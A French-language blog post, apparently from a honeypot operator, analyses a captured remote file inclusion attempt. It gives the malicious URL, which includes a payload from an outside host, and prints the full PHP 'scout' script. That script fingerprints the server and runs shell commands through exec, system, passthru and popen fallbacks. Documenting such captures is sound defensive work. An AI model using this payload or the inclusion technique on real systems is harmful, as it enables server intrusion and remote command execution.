Remote File Inclusion Galore .
Depuis quelque semaine, mes honeypot pogne plein de truc interessant, et je reçois des phishings scam, de plus en plus crédible et élaborer.
Today, un ptit remote file inclusion, pas encore identifier, c’est de toute évidence un “Scout” pour identifier des script vulnérable.
Voici l’URL, qui étais inclue de la maninère : http://www.pure-chaos.org/index.php?file=http://bondick.net/flashchat/nick_image/htaccess?
qui transfère automatiquement a :http://www.pure-chaos.org/?file=http://bondick.net/flashchat/nick_image/htaccess?
Le plus surprenant étant que l’hostname dans mes log est : iad-fw-global.amazon.com , je suis pas sur si c’est un bug de mon script de stat, ou si c’est simplement Amazon qui suis ce lien .
Update : Plutot weird, l’hostname d’Amazon, je suis encore a essayé de figurer, mais je crois que l’inclusion original vien de : fe27.hc.ru . Le Hostname de Amazon est probablement apparue a cause du “Smart link” que j’ai inclue, mais pour ce faire, faudrais que le lien se situe sur la page, ce qui est encore plus bizare ….
Vous trouverez le code PHP complet dans la suite :
$dir = @getcwd();
$ker = @php_uname();
echo "By Blu3H4".(5+2);
$OS = @PHP_OS;
$IpServer = $_SERVER["SERVER_ADDR"];
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get(’safe_mode’);
if ($SafeMode == ”) { $SafeMode = “OFF”; }
else { $SafeMode = “$SafeMode”; }
echo ”
blu3start Server_IP: {$IpServer} __ System:{$OS} __ Uname: {$UNAME} __ PHP: {$PHPv} __ safe mode: {$SafeMode} blu3end”;
echo “Blu3H47
“;
$OS = @PHP_OS;
echo ”
OSTYPE:$OS
“;
echo ”
Kernel:$ker
“;
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo “Free:”.view_size($free).”
“;
$cmd=”id”;
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = ”;
if (!empty($cfe)){
if(function_exists(’exec’)){
@exec($cfe,$res);
$res = join(”\n”,$res);
}
elseif(function_exists(’shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(’system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(’passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 .” GB”;}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 .” MB”;}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 .” KB”;}
else {$size = $size . ” B”;}
return $size;
}
}
?>
Original : http://bondick.net/flashchat/nick_image/htaccess
blog comments powered by Disqus
Add New Comment
Thanks. Your comment is awaiting approval by a moderator.
Do you already have an account? Log in and claim this comment.
Add New Comment
Trackbacks